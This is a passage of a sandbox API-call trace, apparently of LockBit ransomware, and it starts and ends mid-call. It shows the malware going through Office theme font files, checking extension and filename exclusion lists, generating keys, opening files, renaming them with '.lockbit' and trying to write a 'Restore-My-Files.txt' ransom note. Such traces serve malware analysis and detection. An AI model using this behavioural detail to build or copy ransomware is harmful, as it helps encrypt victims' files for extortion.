returned -1 [0195.983] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.983] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.984] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Oriel.xml") returned 1 [0195.984] lstrcmpiW (lpString1="ntldr", lpString2="Oriel.xml") returned -1 [0195.985] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Oriel.xml") returned -1 [0195.985] lstrcmpiW (lpString1="bootsect.bak", lpString2="Oriel.xml") returned -1 [0195.985] lstrcmpiW (lpString1="autorun.inf", lpString2="Oriel.xml") returned -1 [0195.985] lstrcmpiW (lpString1="thumbs.db", lpString2="Oriel.xml") returned 1 [0195.985] lstrcmpiW (lpString1="iconcache.db", lpString2="Oriel.xml") returned -1 [0195.985] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.985] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml") returned=".xml" [0195.985] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.985] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.985] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.986] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.986] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.986] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.986] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.986] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.986] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.986] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.986] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.986] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml.lockbit") returned 83 [0195.986] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\oriel.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.987] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.988] malloc (_Size=0x40068) returned 0x3df0008 [0195.988] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3674) returned 1 [0195.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.988] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.989] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.994] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.994] malloc (_Size=0xbc) returned 0x1fa2ed8 [0195.994] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbc, FileInformationClass=0xa) returned 0xc0000008 [0195.994] free (_Block=0x1fa2ed8) [0195.994] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Oriel.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.994] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.994] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.994] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9b98300, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9b98300, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xeed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Origin.xml", cAlternateFileName="")) returned 1 [0195.995] lstrcmpiW (lpString1=".", lpString2="Origin.xml") returned -1 [0195.995] lstrcmpiW (lpString1="..", lpString2="Origin.xml") returned -1 [0195.995] PathFindExtensionW (pszPath="Origin.xml") returned=".xml" [0195.995] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.995] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.996] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Origin.xml") returned 1 [0195.996] lstrcmpiW (lpString1="ntldr", lpString2="Origin.xml") returned -1 [0195.996] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Origin.xml") returned -1 [0195.996] lstrcmpiW (lpString1="bootsect.bak", lpString2="Origin.xml") returned -1 [0195.997] lstrcmpiW (lpString1="autorun.inf", lpString2="Origin.xml") returned -1 [0195.997] lstrcmpiW (lpString1="thumbs.db", lpString2="Origin.xml") returned 1 [0195.997] lstrcmpiW (lpString1="iconcache.db", lpString2="Origin.xml") returned -1 [0195.997] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.997] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml") returned=".xml" [0195.997] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.997] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.997] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.998] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.998] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.998] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.998] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.998] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.998] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.998] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml.lockbit") returned 84 [0195.998] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\origin.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.999] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.999] malloc (_Size=0x40068) returned 0x3df0008 [0195.999] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3821) returned 1 [0196.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.000] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.001] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.001] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.006] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.006] malloc (_Size=0xbe) returned 0x1fa2ed8 [0196.006] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0xc0000008 [0196.006] free (_Block=0x1fa2ed8) [0196.006] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Origin.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0196.006] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0196.006] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.006] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaeab000, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfaeab000, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Paper.xml", cAlternateFileName="")) returned 1 [0196.006] lstrcmpiW (lpString1=".", lpString2="Paper.xml") returned -1 [0196.006] lstrcmpiW (lpString1="..", lpString2="Paper.xml") returned -1 [0196.006] PathFindExtensionW (pszPath="Paper.xml") returned=".xml" [0196.006] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0196.006] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0196.006] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0196.006] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0196.006] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0196.006] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0196.006] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0196.006] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0196.007] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Paper.xml") returned 1 [0196.008] lstrcmpiW (lpString1="ntldr", lpString2="Paper.xml") returned -1 [0196.008] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Paper.xml") returned -1 [0196.008] lstrcmpiW (lpString1="bootsect.bak", lpString2="Paper.xml") returned -1 [0196.008] lstrcmpiW (lpString1="autorun.inf", lpString2="Paper.xml") returned -1 [0196.008] lstrcmpiW (lpString1="thumbs.db", lpString2="Paper.xml") returned 1 [0196.008] lstrcmpiW (lpString1="iconcache.db", lpString2="Paper.xml") returned -1 [0196.008] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0196.008] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml") returned=".xml" [0196.008] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.008] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0196.008] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0196.009] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0196.009] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml.lockbit") returned 83 [0196.009] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Paper.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\paper.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.011] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.011] malloc (_Size=0x40068) returned 0x3df0008 [0196.011] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3628) returned 1 [0196.011] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.012] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.012] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.012] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, 